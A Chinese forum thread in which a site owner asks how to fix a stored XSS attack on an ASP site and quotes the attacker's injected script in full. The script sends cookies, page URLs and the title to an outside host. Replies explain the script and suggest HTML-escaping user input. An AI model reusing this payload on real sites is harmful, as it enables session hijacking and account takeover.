昨天晚上,我的一个小站被黑客入侵,小站使用的是asp程序做的,黑客主要是通过表单提交js代码到了我的数据库,然后获取了我的后台。
黑客提交的内容:<script src=这里是他的一个地址></script>
打开他的地址出现:
(function(){(new Image()).src='和上面的地址一样/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})())+'&title='+encodeURIComponent((function(){try{return document.title}catch(e){return ''}})());})();
这个该怎么修复呢??
------解决方案--------------------
每次打开提交的内容的时候就会执行这段JS,然后就发送请求把本地的地址跟一些东西发送到他的服务器里。
简单点么就是每次显示内容的时候先把<>转义成<跟>
------解决方案--------------------
我觉得还是暂时关闭网站,查查漏洞出在哪里。
不然即使你页面都改了,漏洞还在,不还是再改一次而已嘛。
------解决方案--------------------
所有用户提交的内容,将<和>替换为<,>这样即使有script节点,也不能执行了,只会被当做普通文本